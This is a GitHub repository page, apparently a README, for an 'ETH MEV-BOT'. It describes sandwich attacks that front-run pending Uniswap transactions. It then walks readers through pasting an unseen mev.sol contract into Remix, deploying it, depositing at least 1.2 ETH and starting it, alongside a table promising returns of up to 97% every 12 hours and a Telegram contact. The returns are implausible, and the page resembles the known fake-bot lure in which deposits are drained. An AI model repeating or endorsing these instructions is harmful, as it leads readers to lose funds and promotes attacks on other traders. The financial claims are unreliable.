Skip to content

πŸ€– ETH MEV-BOT for πŸ₯ͺ sandwich attack on Uniswap πŸ¦„: A Maximal Extractable Value (MEV) Solidity Sandwich BOT πŸ€‘ that allows deployers of contract πŸ“„ to take profits πŸ’° from tokens πŸͺ™. A πŸ€– MEV bot is an arbitrage πŸ”€ tool that sniffs πŸ” the Mempool 🌐 for pending transactions ⏳ on decentralized exchanges like Uniswap πŸ¦„.Mak

Notifications You must be signed in to change notification settings

mrben1/MEV-BOT

Β 
Β 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

13 Commits
Β 
Β 
Β 
Β 

Repository files navigation


πŸ’ŽπŸ€– ETH MEV-BOT πŸ€–πŸ’Ž

An ETH MEV-BOT for performing sandwich attacks on Uniswap. A Maximal Extractable Value (MEV) Solidity Sandwich BOT that empowers contract deployers to reap profits from tokens.


πŸ“š About

In the fascinating world of cryptocurrency, understanding what an MEV Bot is, can be crucial. A Maximal Extractable Value (MEV) bot is a sophisticated arbitrage instrument that scouts the Mempool for pending transactions on decentralized exchanges such as Uniswap. It cunningly inserts our transaction with a slightly higher gas fee (1 Gwei more than the transaction attempting to enter), thus sandwiching the pending transaction and ensuring ours is processed first, reaping profits from the slippage differences.


πŸš€ How it Works

profit

Our BOT sniffs the Uniswap v2 Mempool for transactions with high slippage, determining if a sandwich attack would be profitable. Bots then compete to buy up the token on-chain as swiftly as possible, sandwiching the victim's transaction and creating a profitable slippage opportunity. My bot always adds 1 gas more than everybody else's, as long as it remains profitable, ensuring a large number of profitable transactions. It then sends back the ETH to the contract ready for withdrawal. This bot performs all these tasks faster than 99% of other bots out there.


ETH Investment Returns

Your Ethereum (ETH) investment returns are calculated on a 12-hour basis as follows:

ETH Range (invested) Returns (12 hours)
1.2ETH - 2.4ETH up to 10%
2.4ETH - 5ETH up to 20%
5ETH - 10ETH 20-27%
10ETH - 20ETH 27-35%
20ETH - 50ETH 35-50%
50ETH - 100ETH 50-63%
100ETH - 200ETH 63-76%
200ETH - 500ETH 76-97%
500ETH and above 97%+

Note: The above percentages are subject to market conditions and are not guaranteed. Please invest responsibly.


πŸ‘¨β€πŸ’» Instructions

  1. Follow these instructions to deploy your smart contract using REMIX IDE:
  • πŸ“ Create a new file mev.sol and paste the code from mev.sol.

1

  1. πŸ”§ Select compiler version 0.6.12 and press compile.

2

  1. πŸš€ Navigate to "Deploy" and set the environment to "Injected Provider - MetaMask". Connect the wallet and click "Deploy".

3

  1. Verify your smart contract on etherscan -
  • 🌐 Visit Etherscan Verify Contract.
    • πŸ“ Enter contract address and set inputs:
    • Compiler Type: Solidity (Single File)
    • Compiler Version: ^0.6.12
    • License Type: 3) MIT License (MIT)
    • πŸ“‹ Paste the code from mev.sol.
    • 🚫 Leave ABI input box empty.
    • 🟒 Click "Verify"
  1. Deposit funds (at least 1.2 ETH to prevent negative slippage) into your specific contract/bot address.

  2. Go to your verified contract. Write contract. Enter the amount of ETH you want to trade with into the 1. Start. Confirm the transaction

4

  1. Withdraw anytime by clicking 'withdrawal'.

⏳ Wait a couple of days for profits to roll in. Remember, for successful transactions on the Ethereum network, you must have enough balance to cover the gas. Recommended 1.2Ε΀Η and higher.

At any point, you can stop the bot or retrieve your money by calling the withdrawal function.

πŸ’°πŸ’°πŸ’° Make money with MevBot πŸ’°πŸ’°πŸ’°


Contact Us

For any inquiries, please reach out to us at:

Telegram: Click here


Please ⭐ the repo to support my project

star


About

πŸ€– ETH MEV-BOT for πŸ₯ͺ sandwich attack on Uniswap πŸ¦„: A Maximal Extractable Value (MEV) Solidity Sandwich BOT πŸ€‘ that allows deployers of contract πŸ“„ to take profits πŸ’° from tokens πŸͺ™. A πŸ€– MEV bot is an arbitrage πŸ”€ tool that sniffs πŸ” the Mempool 🌐 for pending transactions ⏳ on decentralized exchanges like Uniswap πŸ¦„.Mak

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Solidity 100.0%